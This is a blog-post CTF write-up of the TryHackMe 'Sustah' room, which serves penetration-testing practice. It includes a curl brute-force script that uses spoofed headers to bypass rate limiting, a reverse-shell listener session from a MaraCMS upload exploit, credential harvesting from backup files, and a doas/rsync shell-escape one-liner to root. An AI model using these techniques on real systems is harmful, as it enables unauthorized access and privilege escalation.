---
layout: post
title:  "THM: Sustah"
date:   2021-01-26 21:00:00 +1100
category: hacking
---

## Sustah
*Play a game to gain access to a vulnerable CMS. Can you beat the odds?*

This is [Sustah](https://tryhackme.com/room/sustah) from THM. It's medium rated. We have another 'hint':

*The developers have added anti-cheat measures to their game. Are you able to defeat the restrictions to gain access to their internal CMS?*

## Ports
SSH and HTTP, plus another HTTP port (8085).

## Port 80
The front page is a picture, with a quote:

>"What you are is what you have been. What you’ll be is what you do now." Buddha

Cool, cool. Dirsearch draws a blank. Doesn't sound like a game though; let's try the other port.

## Port 8085
Here's the game. We find a 'spinner' wheel (like roulette), which we can 'spin'. There is also a message: 

>Feeling lucky? Guess the right number. You have a 0.004% chance of winning.

We can enter a number, and press a button to submit it. Capturing the request shows the number is submitted as a POST request to */home*. 0.004% corresponds to 1 in 25000, so it's just brute force the request with 25000 numbers, right?

Well yes, but it's not quite that simple.

### Anti-cheat
When we send a request, the server sends back a response like this:

{% highlight html %}
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Tue, 26 Jan 2021 09:45:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1004
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 9
X-RateLimit-Reset: 1611654412
Retry-After: 60
{% endhighlight %}

Sending more than 10 requests quickly results in a *429 - Too many requests* error.

I hadn't seen this before, but some research revealed we can set some headers of our own to try to bypass this. In the end what I did was write a script to use cURL to brute force the server, with the additional headers and also setting the user agent to the number I was sending as well; just so it wasn't always the same. I got the script to diff the server response for each value against a prototypical bad response until I got something different:

{% highlight shell %}
for i in {10000..25000}
do
  touch $i.out
  curl --silent 'http://sustah:8085/home' -H 'User-Agent: $i' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://sustah:8085' -H 'Connection: keep-alive' -H 'Referer: http://sustah:8085/home' -H 'Upgrade-Insecure-Requests: 1' -H 'X-Forwarded-For: ' -H 'X-Forwarded-For: 127.0.0.1' -H 'X-Remote-IP: 127.0.0.1' -H 'X-Remote-Addr: 127.0.0.1' -H 'X-Originating-IP: 127.0.0.1' --data-raw "number=$i" >> $i.out
  diff $i.out proto.out
  status=$?
    if [[ $status != 0 ]]
    then
      echo "inspect $i"
    else
      rm $i.out
    fi
done
{% endhighlight %}

This script, after some time, revealed the answer: */YouGotTh3P@th*

## The Path
The path doesn't go with port 8085, it goes on Port 80. And here, we find something called *MaraCMS*, which is a (sorry) butt-ugly [CMS](https://sourceforge.net/projects/maracms/) written in PHP. You can login with default credentials (which then have to be changed); this gets you an admin account. After that I just clicked around until I found a way to upload a shell, it wasn't difficult but then later I Googled and found [instructions](https://www.exploit-db.com/exploits/48780). Bingo. I used the Pentestmonkey PHP reverse shell. 

{% highlight shell %}
root@kali:/opt/tryhackme/sustah# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.135.117] 39808
Linux ubuntu-xenial 4.4.0-197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:25:00 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
{% endhighlight %}

## Kiran
We have one main user; kiran. Enumerate the server to find his password:

{% highlight shell %}
www-data@ubuntu-xenial:/var$ cd backups
cd backups
www-data@ubuntu-xenial:/var/backups$ ls -lash
ls -lash
total 636K
4.0K drwxr-xr-x  2 root root   4.0K Dec  9 10:04 .
4.0K drwxr-xr-x 14 root root   4.0K Dec  6 06:00 ..
4.0K -r--r--r--  1 root root   1.7K Dec  6 13:19 .bak.passwd
 52K -rw-r--r--  1 root root    50K Dec  6 06:25 alternatives.tar.0
8.0K -rw-r--r--  1 root root   6.2K Dec  9 06:46 apt.extended_states.0
4.0K -rw-r--r--  1 root root    715 Dec  6 17:08 apt.extended_states.1.gz
4.0K -rw-r--r--  1 root root    509 Nov 12 19:53 dpkg.diversions.0
4.0K -rw-r--r--  1 root root    207 Dec  6 06:01 dpkg.statoverride.0
536K -rw-r--r--  1 root root   535K Dec  6 06:19 dpkg.status.0
4.0K -rw-------  1 root root    849 Dec  6 06:17 group.bak
4.0K -rw-------  1 root shadow  714 Dec  6 06:17 gshadow.bak
4.0K -rw-------  1 root root   1.7K Dec  6 13:19 passwd.bak
4.0K -rw-------  1 root shadow 1.1K Dec  6 06:17 shadow.bak
www-data@ubuntu-xenial:/var/backups$ cat .bak.passwd
cat .bak.passwd
root:x:0:0:root:/root:/bin/bash
# etc etc
kiran:x:1002:1002:A PASSWORD HERE:/home/kiran:
www-data@ubuntu-xenial:/var/backups$ su kiran      
su kiran
Password: REDACTED

kiran@ubuntu-xenial:/var/backups$ sudo -l
sudo -l
[sudo] password for kiran: trythispasswordforuserkiran

Sorry, user kiran may not run sudo on ubuntu-xenial.
{% endhighlight %}

No sudo, but something similar....

## Privesc
Linpeas shows me something I've never seen before:

{% highlight shell %}
[+] Checking doas.conf
 permit nopass kiran as root cmd rsync  
{% endhighlight %}

Sorry, what? 

>The doas utility is a program originally written for OpenBSD which allows a user to run a command as though they were another user. Typically doas is used to allow non-privleged users to run commands as though they were the root user. The doas program acts as an alternative to sudo, which is a popular method in the Linux community for granting admin access to specific users.

Right, so it's basically sudo. So, with that and [GTFOBins](https://gtfobins.github.io/gtfobins/rsync/#sudo), we should be good?

{% highlight shell %}
kiran@ubuntu-xenial:/var/backups$ /usr/local/bin/doas -u root rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
< -u root rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null                
# cd /root
cd /root
# ls -lash
ls -lash
total 32K
4.0K drwx------  4 root root 4.0K Dec  9 06:51 .
4.0K drwxr-xr-x 25 root root 4.0K Jan 26 08:24 ..
4.0K -rw-rw-r--  1 root root   30 Dec  9 06:51 .bash_profile
4.0K -rw-r--r--  1 root root 3.1K Dec  9 05:26 .bashrc
4.0K drwx------  3 root root 4.0K Dec  7 10:37 .cache
4.0K drwxrwxr-x  2 root root 4.0K Dec  7 09:17 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -r--------  1 root root   33 Dec  9 11:09 root.txt
# cat root.txt
cat root.txt
# REDACTED
# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
ubuntu-xenial
{% endhighlight %}

Done and done!
